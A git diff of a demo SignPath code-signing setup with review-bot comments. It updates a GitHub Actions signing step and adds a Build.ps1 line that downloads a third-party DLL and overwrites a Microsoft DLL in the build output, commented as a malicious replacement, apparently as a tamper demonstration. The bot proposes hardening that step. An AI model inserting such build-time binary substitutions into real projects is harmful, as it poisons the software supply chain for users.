diff --git a/.github/workflows/build-and-sign.yml b/.github/workflows/build-and-sign.yml index 24588b2..f83a4a9 100644 --- a/.github/workflows/build-and-sign.yml +++ b/.github/workflows/build-and-sign.yml @@ -6,8 +6,6 @@ run-name: Demo workflow signing with SignPath on: push: pull_request: - #schedule: - # - cron: '30 3 * * *' # every day at 3:30am UTC workflow_dispatch: # Allows you to run this workflow manually from the Actions tab jobs: @@ -27,6 +25,7 @@ jobs: run: ./sbom/Create-SBOM.ps1 - name: upload-unsigned-artifact + id: upload-unsigned-artifact uses: actions/upload-artifact@v4 with: name: "demo-application" @@ -36,17 +35,22 @@ jobs: .\_BuildResult-unsigned\bom.xml - name: sign - uses: signpath/github-action-submit-signing-request@v0.3 + uses: signpath/github-action-submit-signing-request@v0.4 env: - SIGNPATH_SIGNING_POLICY_SLUG: ${{ (github.ref == 'refs/heads/main' || startsWith(github.ref, 'refs/heads/release/')) && 'release-signing' || 'test-signing' }} + # select release-signing policy for main and release branches + SIGNPATH_SIGNING_POLICY_SLUG: | + ${{ (github.ref == 'refs/heads/main' || startsWith(github.ref, 'refs/heads/release/')) + && 'release-signing' + || 'test-signing' }} with: api-token: '${{ secrets.SIGNPATH_API_TOKEN }}' organization-id: '${{ vars.SIGNPATH_ORGANIZATION_ID }}' project-slug: 'Demo_Application' signing-policy-slug: '${{ env.SIGNPATH_SIGNING_POLICY_SLUG }}' - github-artifact-name: "demo-application" + github-artifact-id: "${{steps.upload-unsigned-artifact.outputs.artifact-id}}" wait-for-completion: true output-artifact-directory: 'demo-application-signed' + github-extended-verification-token: '${{ secrets.EXTENDED_VERIFICATION_TOKEN }}' - name: upload-signed-artifact uses: actions/upload-artifact@v4 diff --git a/src/Build.ps1 b/src/Build.ps1 index 3614b9a..8dfcaa8 100644 --- a/src/Build.ps1 +++ b/src/Build.ps1 
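Review bot: In the sign step, `SIGNPATH_SIGNING_POLICY_SLUG: |` keeps the block scalar's final newline, so after expression substitution the env value is `release-signing` or `test-signing` followed by a line break, and that is what `signing-policy-slug: '${{ env.SIGNPATH_SIGNING_POLICY_SLUG }}'` passes to the action; whether SignPath trims it is not visible here. Changing the header to `SIGNPATH_SIGNING_POLICY_SLUG: >-` folds the three expression lines into one and strips the trailing newline, which is the value the old single-line form produced. A second point: the new `github-extended-verification-token: '${{ secrets.EXTENDED_VERIFICATION_TOKEN }}'` (like `api-token`) reads a repository secret, and the first hunk shows the workflow also runs on `pull_request`, where secrets are withheld for forked PRs, so the step would submit an empty token there; consider guarding the step with `if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name == github.repository`. Binding the request to `github-artifact-id` from the `upload-unsigned-artifact` step output, rather than the artifact name, is the right move and is what the `id:` added in the second hunk exists for. The enclosing job definition starts before this hunk.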
@@ -1,6 +1,10 @@ # build .Net application dotnet build --configuration Release src/DemoExample.csproj +# maliciously replace the Microsoft DLL +Invoke-WebRequest https://github.com/carterjones/hello-world-dll/releases/download/v1.0.0/hello-world-x64.dll ` + -OutFile .\src\bin\Release\net7.0\Microsoft.Extensions.DependencyModel.dll + # build MSI installer Copy-Item .\src\installer\description.wxs .\src\bin\Release\net7.0\description.wxs -Force Push-Location .\src\bin\Release\net7.0
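Review bot: The new `Invoke-WebRequest` fetches a binary from a third-party release at build time and writes it over `Microsoft.Extensions.DependencyModel.dll` with no integrity check and no explicit failure mode, so the build output now depends on whatever that URL serves on a given day. Even as a deliberate tamper demonstration (which the comment `# maliciously replace the Microsoft DLL` suggests, though the intent is not otherwise stated), the fetched file should be pinned by SHA-256 with `Get-FileHash` and the download run with `-ErrorAction Stop`, otherwise a changed or missing upstream asset makes the demo fail in a way unrelated to the signing pipeline. The comment should also say why the substitution is there rather than only that it is malicious. The rewritten lines below use a labelled placeholder for the expected hash, which must come from a trusted copy of the file.
```powershell
# … unchanged: dotnet build …
# Deliberate tamper demo: overwrite a Microsoft DLL in the build output with a
# third-party binary so the signing pipeline has a substitution to detect.
$tamperUrl = 'https://github.com/carterjones/hello-world-dll/releases/download/v1.0.0/hello-world-x64.dll'
$tamperDll = '.\src\bin\Release\net7.0\Microsoft.Extensions.DependencyModel.dll'
Invoke-WebRequest -Uri $tamperUrl -OutFile $tamperDll -ErrorAction Stop
# Pin the fetched file so the demo is reproducible; <EXPECTED_SHA256> is a placeholder
if ((Get-FileHash -Path $tamperDll -Algorithm SHA256).Hash -ne '<EXPECTED_SHA256>') {
    throw 'hello-world-x64.dll did not match the pinned SHA-256'
}
# … unchanged: MSI installer build …
```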